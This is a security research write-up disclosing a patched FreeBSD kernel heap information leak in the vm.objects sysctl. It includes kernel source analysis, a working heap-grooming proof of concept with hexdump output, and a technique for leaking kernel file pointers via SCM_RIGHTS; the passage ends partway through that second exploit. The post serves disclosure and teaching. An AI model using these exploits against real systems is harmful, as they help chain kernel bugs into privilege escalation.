Access Vector

chris@accessvector.net

FreeBSD 11.2+ vm.objects sysctl Kernel Heap Information Disclosure

chris

Introduction

FreeBSD 11.2 introduced a kernel heap information disclosure bug, reachable through the vm.objects sysctl, caused by missing memory sanitisation. In fact, the underlying bug has been present since 10.3, but manifested as a stack information disclosure there instead.

While kernel information disclosure bugs aren't terribly interesting by themselves, they can form an important part of an exploit chain: disclosing useful heap addresses is often essential to paving the way to upgrade a restricted memory corruption vulnerability to an arbitrary read/write capability.

This article describes the bug, discusses simple grooming options for leaking potentially useful pointers and provides a proof-of-concept exploit to demonstrate the issue.

The vulnerability was reported to the FreeBSD Security Officer Team on the 4th of December, 2022, and subsequently patched in January after the holiday season had passed. Thanks again to Philip Paeps from the FreeBSD Security Team for a very fast response.

Vulnerability Overview

For the uninitiated, "sysctl"s are something of a second-class syscall interface. They're basically system-wide key/value pairs exposed by the kernel for reading (and sometimes writing) through the sysctl(2) syscall.

The sysctl(2) syscall allows userland to provide 3 high-level pieces of data:

  1. The key of the sysctl to query.
  2. An optional userland pointer and size to fetch the "old" value into.
  3. An optional userland pointer and size to provide a "new" value.

For a lot of sysctls, since they're system-wide, providing a "new" value requires root privileges. To read some value, userland will typically just provide a pointer/size for the "old" value and leave the "new" pointer/size as NULL/0.
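
To make the interface concrete, here's a minimal sketch of reading a simple integer sysctl (hw.ncpu) via sysctl(2); the "old" pointer receives the value and the "new" pointer is left as NULL:

#include <err.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/sysctl.h>

int
main(void)
{
    int mib[2] = { CTL_HW, HW_NCPU };   /* the "key": hw.ncpu */
    int ncpu;
    size_t oldlen = sizeof(ncpu);

    /* "old" pointer/size receive the value; "new" is left as NULL/0 */
    if (-1 == sysctl(mib, 2, &ncpu, &oldlen, NULL, 0))
        err(1, "sysctl");

    printf("hw.ncpu = %d\n", ncpu);
    return 0;
}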

While most sysctls expose simple primitive datatypes, such as strings or integers, some sysctls are more complex and interesting. To serve the more interesting cases, the FreeBSD kernel source provides the SYSCTL_PROC macro, which basically says "declare this sysctl and use that function to handle the request".

The functions that handle the requests sometimes get less attention than traditional syscalls, so they're worth exploring for vulnerabilities.

Here's the vm.objects sysctl definition from the vm/vm_object.c file in the FreeBSD kernel:

    static int
[2] sysctl_vm_object_list(SYSCTL_HANDLER_ARGS)
    {
            return (vm_object_list_handler(req, false));
    }
    
[1] SYSCTL_PROC(_vm, OID_AUTO, objects, CTLTYPE_STRUCT | CTLFLAG_RW | CTLFLAG_SKIP |
        CTLFLAG_MPSAFE, NULL, 0, sysctl_vm_object_list, "S,kinfo_vmobject",
        "List of VM objects");

We can see the SYSCTL_PROC macro defining the "objects" node of the "vm" root node [1] and referencing the function sysctl_vm_object_list [2] as the handler function.

Notice that the SYSCTL_HANDLER_ARGS macro expands to the standard argument list of a sysctl implementation:

    #define SYSCTL_HANDLER_ARGS struct sysctl_oid *oidp, void *arg1,        \
            intmax_t arg2, struct sysctl_req *req
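
To make the pattern concrete, a handler typically computes a value and hands it back to the requester with SYSCTL_OUT. Here's a hypothetical sketch (the names are illustrative, not from the FreeBSD tree) of what a minimal SYSCTL_PROC pairing looks like:

    /* Hypothetical example for illustration only. */
    static int
    sysctl_example_value(SYSCTL_HANDLER_ARGS)
    {
            int value = 42;         /* whatever we want to expose */

            /* copy the value out to the requester's "old" buffer */
            return (SYSCTL_OUT(req, &value, sizeof(value)));
    }

    SYSCTL_PROC(_kern, OID_AUTO, example_value,
        CTLTYPE_INT | CTLFLAG_RD | CTLFLAG_MPSAFE, NULL, 0,
        sysctl_example_value, "I", "Illustrative read-only value");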

Let's see what actually happens in vm_object_list_handler, then:

    static int
    vm_object_list_handler(struct sysctl_req *req, bool swap_only)
    {
            struct kinfo_vmobject *kvo;
            char *fullpath, *freepath;
            struct vnode *vp;
            struct vattr va;
            vm_object_t obj;
            vm_page_t m;
            u_long sp;
            int count, error;
    
[3]         if (req->oldptr == NULL) {
                    /*
                     * If an old buffer has not been provided, generate an
                     * estimate of the space needed for a subsequent call.
                     */
    ...
                    return (SYSCTL_OUT(req, NULL, sizeof(struct kinfo_vmobject) *
                        count * 11 / 10));
            }
    
[4]         kvo = malloc(sizeof(*kvo), M_TEMP, M_WAITOK);
            error = 0;
    
            /*
             * VM objects are type stable and are never removed from the
             * list once added.  This allows us to safely read obj->object_list
             * after reacquiring the VM object lock.
             */
            mtx_lock(&vm_object_list_mtx);
[5]         TAILQ_FOREACH(obj, &vm_object_list, object_list) {
    ...
                    if (obj->type == OBJT_DEAD ||
                        (swap_only && (obj->flags & (OBJ_ANON | OBJ_SWAP)) == 0))
                            continue;
                    VM_OBJECT_RLOCK(obj);
                    if (obj->type == OBJT_DEAD ||
                        (swap_only && (obj->flags & (OBJ_ANON | OBJ_SWAP)) == 0)) {
                            VM_OBJECT_RUNLOCK(obj);
                            continue;
                    }
                    mtx_unlock(&vm_object_list_mtx);
[6]                 kvo->kvo_size = ptoa(obj->size);
                    kvo->kvo_resident = obj->resident_page_count;
                    kvo->kvo_ref_count = obj->ref_count;
    ...
                    /* Pack record size down */
                    kvo->kvo_structsize = offsetof(struct kinfo_vmobject, kvo_path)
                        + strlen(kvo->kvo_path) + 1;
                    kvo->kvo_structsize = roundup(kvo->kvo_structsize,
                        sizeof(uint64_t));
[7]                 error = SYSCTL_OUT(req, kvo, kvo->kvo_structsize);
                    maybe_yield();
                    mtx_lock(&vm_object_list_mtx);
                    if (error)
                            break;
            }
            mtx_unlock(&vm_object_list_mtx);
            free(kvo, M_TEMP);
            return (error);
    }

The purpose of this sysctl is to provide userland with a list of information about virtual memory objects. This could be a pretty lengthy list depending on exactly how many objects exist on the system.

If userland called the sysctl with a NULL "old" pointer, the kernel returns an estimate of the buffer size that should be allocated for a subsequent call [3].
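
In userland this shows up as the usual two-call pattern: the first call passes a NULL "old" pointer to get the size estimate, the second supplies a buffer of that size. A sketch:

#include <err.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/sysctl.h>

int
main(void)
{
    size_t len = 0;
    void *buf;

    /* First call: NULL "old" pointer, kernel returns a size estimate. */
    if (-1 == sysctlbyname("vm.objects", NULL, &len, NULL, 0))
        err(1, "sysctlbyname (size)");

    /* Second call: provide a buffer of (at least) the estimated size. */
    if (NULL == (buf = malloc(len)))
        err(1, "malloc");

    if (-1 == sysctlbyname("vm.objects", buf, &len, NULL, 0))
        err(1, "sysctlbyname (data)");

    /* len now holds the number of bytes actually written */
    free(buf);
    return 0;
}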

If an "old" pointer/size was provided, then the kernel tries to provide as much of the information as possible. It begins by allocating an object that it will populate for each object [4]. This is a struct kinfo_vmobject struct.

Next, it loops through all of the objects on the global vm_object_list [5] and populates that information object with various pieces of information — some of which are shown in the snippet starting at [6], but many are omitted here for brevity.

Once the various fields are set, the kernel copies out the information about this current virtual memory object [7] and continues on to the next one.

The short story of what's happening, then, is that the kernel iterates over all of the registered virtual memory objects and copies out some information object for each to userland.

The object the kernel uses to store this information is a kinfo_vmobject, and it's particularly interesting because the call to malloc doesn't pass the M_ZERO flag. That means the memory will not be zero-initialised by the kernel heap allocator.

If any fields aren't explicitly set by the logic here, those uninitialised bytes will be copied out to userland.

Sure enough, it seems there are plenty of bytes that remain uninitialised:

    /*
     * The "vm.objects" sysctl provides a list of all VM objects in the system
     * via an array of these entries.
     */
    struct kinfo_vmobject {
            int     kvo_structsize;                 /* Variable size of record. */
            int     kvo_type;                       /* Object type: KVME_TYPE_*. */
            uint64_t kvo_size;                      /* Object size in pages. */
            uint64_t kvo_vn_fileid;                 /* inode number if vnode. */
            uint32_t kvo_vn_fsid_freebsd11;         /* dev_t of vnode location. */
            int     kvo_ref_count;                  /* Reference count. */
            int     kvo_shadow_count;               /* Shadow count. */
            int     kvo_memattr;                    /* Memory attribute. */
            uint64_t kvo_resident;                  /* Number of resident pages. */
            uint64_t kvo_active;                    /* Number of active pages. */
            uint64_t kvo_inactive;                  /* Number of inactive pages. */
            union {
                    uint64_t _kvo_vn_fsid;
                    uint64_t _kvo_backing_obj;      /* Handle for the backing obj */
            } kvo_type_spec;                        /* Type-specific union */
            uint64_t kvo_me;                        /* Uniq handle for anon obj */
            uint64_t _kvo_qspare[6];
            uint32_t kvo_swapped;                   /* Number of swapped pages */
            uint32_t _kvo_ispare[7];
            char    kvo_path[PATH_MAX];             /* Pathname, if any. */
    };

At first glance, it looks like we've struck info-disclosure gold with the very large kvo_path field at the end (PATH_MAX is 1024), but if we refer back to the copyout logic, the kernel packs the record size down using the strlen of that field, so the unused tail of kvo_path never reaches userland.

Even so, there are a few "spare" fields that provide more than enough useful bytes to leak.
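
To know where to look for those spare fields in the leaked output, we can ask the compiler for their offsets within struct kinfo_vmobject. A quick sketch (exact offsets vary with FreeBSD version and architecture):

#include <stddef.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/sysctl.h>
#include <sys/user.h>

int
main(void)
{
    printf("_kvo_qspare: offset %zu, %zu bytes\n",
        offsetof(struct kinfo_vmobject, _kvo_qspare),
        sizeof(((struct kinfo_vmobject *)0)->_kvo_qspare));
    printf("_kvo_ispare: offset %zu, %zu bytes\n",
        offsetof(struct kinfo_vmobject, _kvo_ispare),
        sizeof(((struct kinfo_vmobject *)0)->_kvo_ispare));
    printf("kvo_path:    offset %zu\n",
        offsetof(struct kinfo_vmobject, kvo_path));
    return 0;
}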

Exploitability Analysis

Uninitialised kernel heap disclosures aren't useful in every case. The case here is pretty promising, however, because the allocation comes from the general purpose heap (i.e. through malloc) and there are clearly plenty of bytes for us to target with a groom in the _kvo_qspare and _kvo_ispare fields.

So long as we can think of a way to get some useful kernel heap pointers leaked through those fields, this is a useful leak to have.

Before getting to the point of considering useful leaks, however, we should demonstrate the trivial case: leaking a bunch of bytes we can control as a starting point.

The ioctl(2) syscall is a good candidate for this:

    int
    sys_ioctl(struct thread *td, struct ioctl_args *uap)
    {
            u_char smalldata[SYS_IOCTL_SMALL_SIZE] __aligned(SYS_IOCTL_SMALL_ALIGN);
            uint32_t com;
            int arg, error;
            u_int size;
            caddr_t data;
    ...
[1]         size = IOCPARM_LEN(com);
    ...
            if (size > 0) {
                    if (com & IOC_VOID) {
    ...
                    } else {
                            if (size > SYS_IOCTL_SMALL_SIZE)
[2]                                 data = malloc((u_long)size, M_IOCTLOPS, M_WAITOK);
                            else
                                    data = smalldata;
                    }
    ...
            if (com & IOC_IN) {
[3]                 error = copyin(uap->data, data, (u_int)size);
    ...
            error = kern_ioctl(td, uap->fd, com, data);
    
            if (error == 0 && (com & IOC_OUT))
                    error = copyout(data, uap->data, (u_int)size);
    
    out:
            if (size > SYS_IOCTL_SMALL_SIZE)
[4]                 free(data, M_IOCTLOPS);
            return (error);
    }

The size of the data from userland is extracted from the ioctl command itself using the IOCPARM_LEN macro [1]. For small sizes, the kernel uses a buffer on the stack, but over a certain limit it allocates a buffer of that size with malloc [2]. That limit, SYS_IOCTL_SMALL_SIZE, is 128 bytes.

With a buffer allocated, it then does a copyin [3], calls down to kern_ioctl and then frees on the exit path [4].

Why is this useful? The FreeBSD kernel heap allocator works in a LIFO fashion: malloc will return the last memory chunk freed (for the same size class). That means that if we invoke a spurious ioctl (or an ioctl on a spurious file descriptor), this becomes a simple malloc, copyin, free gadget that we can use to control the uninitialised bytes of the next malloc of the same size class.

If the next malloc is the one from the vm.objects sysctl then we should see those bytes coming back to us.

Here's a simple PoC to test:

#include <err.h>
#include <stdio.h>
#include <string.h>
#include <strings.h>
#include <sys/types.h>
#include <sys/ioctl.h>
#include <sys/sysctl.h>
#include <sys/user.h>
#include <unistd.h>

static void
hexdump(const void *data, size_t datasz)
{
    const unsigned char *b = data;
    size_t n;

    for (n = 0; n < datasz; ++n) {
        fprintf(stderr, "%02x ", b[n]);

        switch ((n + 1) & 0xf) {
        case 0: fputs("\n", stderr); break;
        case 8: fputs(" ", stderr); break;
        }
    }

    fputs("\n", stderr);
}

static void
prep_leak(void)
{
    unsigned char dummy[sizeof(struct kinfo_vmobject)];

    memset(dummy, 'A', sizeof(dummy));
    ioctl(-1, _IOW(0, 0, dummy), dummy);
}

int
main(int argc, char *argv[])
{
    unsigned char buf[sizeof(struct kinfo_vmobject)];
    size_t bufsz = sizeof(buf);

    bzero(buf, sizeof(buf));

    prep_leak();
    sysctlbyname("vm.objects", buf, &bufsz, NULL, 0);

    hexdump(buf, bufsz);
    return 0;
}

Trying it out, we can see our controlled data:

$ cc -o vm_objects vm_objects.c && ./vm_objects
a8 00 00 00 01 00 00 00  00 40 00 00 00 00 00 00
00 00 00 00 00 00 00 00  00 00 00 00 01 00 00 00
00 00 00 00 02 00 00 00  04 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
00 41 41 41 41 41 41 41  a8 00 00 00 01 00 00 00
00 40 00 00 00 00 00 00  00 00 00 00 00 00 00 00
00 00 00 00 01 00 00 00  00 00 00 00 02 00 00 00
04 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  00 41 41 41 41 41 41 41
a8 00 00 00 01 00 00 00  00 40 00 00 00 00 00 00
00 00 00 00 00 00 00 00  00 00 00 00 01 00 00 00
00 00 00 00 02 00 00 00  04 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
00 41 41 41 41 41 41 41  a8 00 00 00 01 00 00 00
00 40 00 00 00 00 00 00  00 00 00 00 00 00 00 00
00 00 00 00 01 00 00 00  00 00 00 00 02 00 00 00
04 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  00 41 41 41 41 41 41 41
a8 00 00 00 01 00 00 00  00 40 00 00 00 00 00 00
00 00 00 00 00 00 00 00  00 00 00 00 01 00 00 00
00 00 00 00 02 00 00 00  04 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
00 41 41 41 41 41 41 41  a8 00 00 00 01 00 00 00
00 40 00 00 00 00 00 00  00 00 00 00 00 00 00 00
00 00 00 00 01 00 00 00  00 00 00 00 02 00 00 00
04 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  00 41 41 41 41 41 41 41
a8 00 00 00 01 00 00 00  00 40 00 00 00 00 00 00
00 00 00 00 00 00 00 00  00 00 00 00 01 00 00 00
00 00 00 00 02 00 00 00  04 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41
00 41 41 41 41 41 41 41  a8 00 00 00 05 00 00 00

You'll notice a lot of repeated data here. That's because we provided a buffer big enough to fit a whole struct kinfo_vmobject in, but due to the strlen of the path limiting the copyout, each virtual memory object actually only occupies a small amount of the buffer.

The repeating 0x41 ('A') regions are the "spare" fields that we're seeing for each object.
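
Since each record is packed down to kvo_structsize bytes before the copyout, a consumer walks the returned buffer record by record rather than striding by sizeof(struct kinfo_vmobject). A sketch, assuming buf and bufsz are the buffer and returned length from the sysctl call in the PoC above:

/* Walk the variable-length records returned by vm.objects. */
unsigned char *p = buf;
unsigned char *end = buf + bufsz;

while ((size_t)(end - p) >= sizeof(int)) {
    struct kinfo_vmobject *kvo = (struct kinfo_vmobject *)p;

    /* stop at a truncated or nonsensical record */
    if (kvo->kvo_structsize <= 0 ||
        (size_t)kvo->kvo_structsize > (size_t)(end - p))
        break;

    /* fields up to kvo_path + strlen(kvo_path) are valid here */
    p += kvo->kvo_structsize;
}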

Finding a Leak Target

When in possession of a kernel heap information disclosure bug like this, we need to do a little research to groom the heap in a way that leaks some data we actually care about. Sadly, nobody cares about leaking "AAAA...", so we'll need to think some more.

The first thing we need to understand is which malloc bucket this leak is coming from. The kernel heap allocator coarsely organises its internal allocation buckets by size. To determine which bucket this particular leak is coming from, we need to know the size of the kinfo_vmobject struct:

$ lldb /boot/kernel/kernel
(lldb) target create "/boot/kernel/kernel"
Current executable set to '/boot/kernel/kernel' (aarch64).
(lldb) p sizeof(struct kinfo_vmobject)
(unsigned long) $0 = 1184

And check that against the malloc bucket sizes defined in kern/kern_malloc.c:

struct {
        int kz_size;
        const char *kz_name;
        uma_zone_t kz_zone[MALLOC_DEBUG_MAXZONES];
} kmemzones[] = {
        {16, "malloc-16", },
        {32, "malloc-32", },
        {64, "malloc-64", },
        {128, "malloc-128", },
        {256, "malloc-256", },
        {384, "malloc-384", },
        {512, "malloc-512", },
        {1024, "malloc-1024", },
        {2048, "malloc-2048", },
        {4096, "malloc-4096", },
        {8192, "malloc-8192", },
        {16384, "malloc-16384", },
        {32768, "malloc-32768", },
        {65536, "malloc-65536", },
        {0, NULL},
};

Since the size of the object is 1184 bytes, it's too big to come from the 1024 bucket — it must be from the 2048 bucket.
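
The rule is simply the smallest bucket that fits the request. A small helper mirroring the kmemzones table makes that explicit (a sketch; requests above the largest bucket are handled directly by the VM rather than a bucket):

/* Map an allocation size to its malloc bucket (mirrors kmemzones above). */
static size_t
malloc_bucket(size_t size)
{
    static const size_t buckets[] = {
        16, 32, 64, 128, 256, 384, 512, 1024,
        2048, 4096, 8192, 16384, 32768, 65536
    };
    size_t n;

    for (n = 0; n < sizeof(buckets) / sizeof(buckets[0]); ++n) {
        if (size <= buckets[n])
            return buckets[n];
    }
    return 0;   /* too big for a bucket */
}

With the sizes above, malloc_bucket(1184) returns 2048, matching the reasoning here.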

Whatever we're trying to leak, it has to come from the same bucket and has to contain something useful.

This is where a hunt for "elastic objects" is pretty handy. Rather than just looking for single structs of the right size that happen to be allocated using malloc, we can look for calls to malloc that have some dynamic element to them.

One such useful elastic object is the allocation done when file descriptors are sent over a UNIX domain socket with the SCM_RIGHTS auxiliary control message ("cmsg").

Leaking File Structs with SCM_RIGHTS

The uipc_send kernel function handles the guts of sending data over a UNIX domain socket:

    static int
    uipc_send(struct socket *so, int flags, struct mbuf *m, struct sockaddr *nam,
        struct mbuf *control, struct thread *td)
    {
    ...
            if (control != NULL &&
[1]             (error = unp_internalize(&control, td, NULL, NULL, NULL)))
                    goto release;

If an auxiliary control message was passed to the sendmsg(2) syscall, the kernel calls unp_internalize [1].

Control messages are basically extra bits of information that can be sent with a message. The control messages themselves are just sent in an array, one after another, and each message in that list can have a different "type", length and associated data.

For UNIX domain sockets, there are a few different types of extra data that a process can send in this way, but the one we're interested in here is SCM_RIGHTS, which allows a process to send file descriptors to the recipient. It's an interesting and neat feature that we can see unp_internalize handle:

    static int
    unp_internalize(struct mbuf **controlp, struct thread *td,
        struct mbuf **clast, u_int *space, u_int *mbcnt)
    {
            struct mbuf *control, **initial_controlp;
            struct proc *p;
            struct filedesc *fdesc;
            struct bintime *bt;
            struct cmsghdr *cm;
            struct cmsgcred *cmcred;
            struct filedescent *fde, **fdep, *fdev;
            struct file *fp;
            struct timeval *tv;
            struct timespec *ts;
            void *data;
            socklen_t clen, datalen;
            int i, j, error, *fdp, oldfds;
            u_int newlen;
    
            MPASS((*controlp)->m_next == NULL); /* COMPAT_OLDSOCK may violate */
            UNP_LINK_UNLOCK_ASSERT();
    
            p = td->td_proc;
            fdesc = p->p_fd;
            error = 0;
            control = *controlp;
            *controlp = NULL;
            initial_controlp = controlp;
[2]         for (clen = control->m_len, cm = mtod(control, struct cmsghdr *),
                data = CMSG_DATA(cm);
    
                clen >= sizeof(*cm) && cm->cmsg_level == SOL_SOCKET &&
                clen >= cm->cmsg_len && cm->cmsg_len >= sizeof(*cm) &&
                (char *)cm + cm->cmsg_len >= (char *)data;
    
                clen -= min(CMSG_SPACE(datalen), clen),
                cm = (struct cmsghdr *) ((char *)cm + CMSG_SPACE(datalen)),
                data = CMSG_DATA(cm)) {
    ...
                    datalen = (char *)cm + cm->cmsg_len - (char *)data;
                    switch (cm->cmsg_type) {
    ...
                    case SCM_RIGHTS:
[3]                         oldfds = datalen / sizeof (int);
                            if (oldfds == 0)
                                    continue;
                            /* On some machines sizeof pointer is bigger than
                             * sizeof int, so we need to check if data fits into
                             * single mbuf.  We could allocate several mbufs, and
                             * unp_externalize() should even properly handle that.
                             * But it is not worth to complicate the code for an
                             * insane scenario of passing over 200 file descriptors
                             * at once.
                             */
                            newlen = oldfds * sizeof(fdep[0]);
                            if (CMSG_SPACE(newlen) > MCLBYTES) {
                                    error = EMSGSIZE;
                                    goto out;
                            }
                            /*
                             * Check that all the FDs passed in refer to legal
                             * files.  If not, reject the entire operation.
                             */
                            fdp = data;
                            FILEDESC_SLOCK(fdesc);
[4]                         for (i = 0; i < oldfds; i++, fdp++) {
                                    fp = fget_noref(fdesc, *fdp);
                                    if (fp == NULL) {
                                            FILEDESC_SUNLOCK(fdesc);
                                            error = EBADF;
                                            goto out;
                                    }
                                    if (!(fp->f_ops->fo_flags & DFLAG_PASSABLE)) {
                                            FILEDESC_SUNLOCK(fdesc);
                                            error = EOPNOTSUPP;
                                            goto out;
                                    }
                            }
    
                            /*
                             * Now replace the integer FDs with pointers to the
                             * file structure and capability rights.
                             */
[5]                         *controlp = sbcreatecontrol(NULL, newlen,
                                SCM_RIGHTS, SOL_SOCKET, M_WAITOK);
                            fdp = data;
[6]                         for (i = 0; i < oldfds; i++, fdp++) {
                                    if (!fhold(fdesc->fd_ofiles[*fdp].fde_file)) {
                                            fdp = data;
                                            for (j = 0; j < i; j++, fdp++) {
                                                    fdrop(fdesc->fd_ofiles[*fdp].
                                                        fde_file, td);
                                            }
                                            FILEDESC_SUNLOCK(fdesc);
                                            error = EBADF;
                                            goto out;
                                    }
                            }
                            fdp = data;
                            fdep = (struct filedescent **)
                                CMSG_DATA(mtod(*controlp, struct cmsghdr *));
[7]                         fdev = malloc(sizeof(*fdev) * oldfds, M_FILECAPS,
                                M_WAITOK);
[8]                         for (i = 0; i < oldfds; i++, fdev++, fdp++) {
                                    fde = &fdesc->fd_ofiles[*fdp];
                                    fdep[i] = fdev;
[9]                                 fdep[i]->fde_file = fde->fde_file;
                                    filecaps_copy(&fde->fde_caps,
                                        &fdep[i]->fde_caps, true);
                                    unp_internalize_fp(fdep[i]->fde_file);
                            }
                            FILEDESC_SUNLOCK(fdesc);
                            break;
    ...

This code looks long and complex, but we needn't fear it. At the top level, the code loops over the list of cmsgs [2] and switches on the type of each. For a control message of type SCM_RIGHTS, the kernel first determines how many file descriptors follow the cmsg header [3].

Next, it loops over all of the file descriptors making sure that they're able to be sent [4] (some types of file are forbidden from being sent like this) before allocating an mbuf to hold an array of filedescent pointers [5]. mbufs are a unit of heap allocation specific to the networking stack in FreeBSD. They're backed by their own special zone and arbitrary lengths are constructed by creating a linked list of mbufs. We can largely ignore them for the discussion here.

A filedescent is how an open file within a process' file descriptor table is represented. In fact, a numeric file descriptor is literally just an index into a table of these structures:

    struct filedescent {
            struct file     *fde_file;      /* file structure for open file */
            struct filecaps  fde_caps;      /* per-descriptor rights */
            uint8_t          fde_flags;     /* per-process open file flags */
            seqc_t           fde_seqc;      /* keep file and caps in sync */
    };

Each entry points to the file struct that's open and has some other associated fields (e.g. if UF_CLOEXEC has been set for that descriptor).

Remember that at this point the kernel's only allocated an array of pointers to these.

With an array of filedescent pointers allocated, the next step is to walk over the list of file descriptors again and obtain a reference to each [6]. If this fails for any, the whole process is aborted.

Finally, the kernel has determined that the descriptors are sendable and it was able to acquire a reference on each. The last step is to allocate an array to hold the actual filedescent structs [7], then loop over the descriptors one last time [8], setting the filedescent pointers in the mbuf to an element in this new mallocd array [9].

Here's a rough diagram of how this data will look:

┌────────────────────────────────────────────────────────────────────────────────┐
│mbuf_t                                                                          │
├──────────────┬─────────────────────────────────────────────────────────────────┤
│    m_hdr     │                             m_data                              │
└──────────────┴─────────────────────────────────────────────────────────────────┘
                                                │                                 
           ┌──────────────┬──────────────┬──────┴───────┬──────────────┐          
           ▼              ▼              ▼              ▼              ▼          
   ┌──────────────┬──────────────┬──────────────┬──────────────┬──────────────┐   
   │ filedescent  │ filedescent  │ filedescent  │ filedescent  │ filedescent  │   
   ├──────────────┴──────────────┴──────────────┴──────────────┴──────────────┤   
   │malloc(nfd * sizeof(struct filedescent))                                  │   
   └──────────────────────────────────────────────────────────────────────────┘   

When the message is received by the recipient process, the operation is reversed: the filedescents are pulled out of the control message and inserted into the receiving process' file descriptor table. The array of filedescents that was allocated in unp_internalize is freed once this is done. See unp_externalize if you're interested.

The elastic object we're interested in leaking is the array of filedescent structs at [7]. By leaking the contents of that array, we can discover a kernel pointer to a live file struct. That's a useful pointer to have if we have an arbitrary write, since we can do interesting things like granting write access to a file we have open for reading (e.g. /etc/passwd or /etc/libmap.conf — see man libmap.conf to spark your imagination).

We can control the size of the malloc through the number of file descriptors we send in our cmsg. Hitting our target is simple:

$ lldb /boot/kernel/kernel
(lldb) target create "/boot/kernel/kernel"
Current executable set to '/boot/kernel/kernel' (aarch64).
(lldb) p sizeof(struct kinfo_vmobject) / sizeof(struct filedescent)
(unsigned long) $0 = 24

We just need to send 24 file descriptors. That makes the filedescent array roughly 1.1KB: over 1024 bytes, so it's drawn from the same malloc-2048 bucket as the kinfo_vmobject allocation.

Proof of Concept

Our final exploitation strategy is:

  1. Create a connected pair of UNIX domain sockets with socketpair(2).
  2. Fork and have the child process block on a recv(2).
  3. Open the file that we wish to disclose the file pointer of.
  4. Send a message to the child process with an SCM_RIGHTS cmsg containing 24 copies of that file descriptor.
  5. Once the descriptors have been received by the child, leak memory via the vm.objects sysctl.

Here's a simple PoC:

/*
 * FreeBSD 11.2+ vm.objects sysctl Kernel Heap Information Disclosure PoC
 * 2022-Dec-08
 *
 * chris@accessvector.net
 */
#include <err.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <sys/types.h>
#include <sys/cpuset.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <sys/sysctl.h>
#include <sys/user.h>
#include <sys/wait.h>
#include <unistd.h>

static void
pin_to_cpu(size_t n)
{
    cpuset_t cs;
    CPU_ZERO(&cs);
    CPU_SET(n, &cs);

    if (-1 == cpuset_setaffinity(CPU_LEVEL_WHICH, CPU_WHICH_PID, -1,
                sizeof(cs), &cs))
        err(1, "cpuset_setaffinity");
}

static void
child_proc(int sock)
{
    unsigned char ack = 0;

    /* receive the file descriptors */
    if (-1 == recv(sock, &ack, sizeof(ack), 0))
        err(1, "recv");

    /* acknowledge receipt so we know the buffer is free */
    if (-1 == send(sock, &ack, sizeof(ack), 0))
        err(1, "send");
}

#define NFDS (sizeof(struct kinfo_vmobject) / sizeof(struct filedescent))

static const void *
leak_kptr(int fd)
{
    struct kinfo_vmobject buf;
    size_t bufsz = sizeof(buf);
    pid_t child;
    int s[2];
    unsigned char ack = 0;
    struct iovec iov = {
        .iov_base = &ack,
        .iov_len = sizeof(ack)
    };
    unsigned char cmsgbuf[CMSG_SPACE(sizeof(int) * NFDS)];
    struct cmsghdr *cmsgh;
    struct msghdr msgh;
    size_t n;
    int *pfd;

    if (-1 == socketpair(AF_UNIX, SOCK_STREAM, PF_UNSPEC, s))
        err(1, "socketpair");

    switch ((child = fork())) {
    case -1: err(1, "fork");
    case 0:
             /* child will receive the fds */
             close(s[0]);
             pin_to_cpu(0);
             child_proc(s[1]);
             exit(0);
    }

    /* this proc will send the fds */
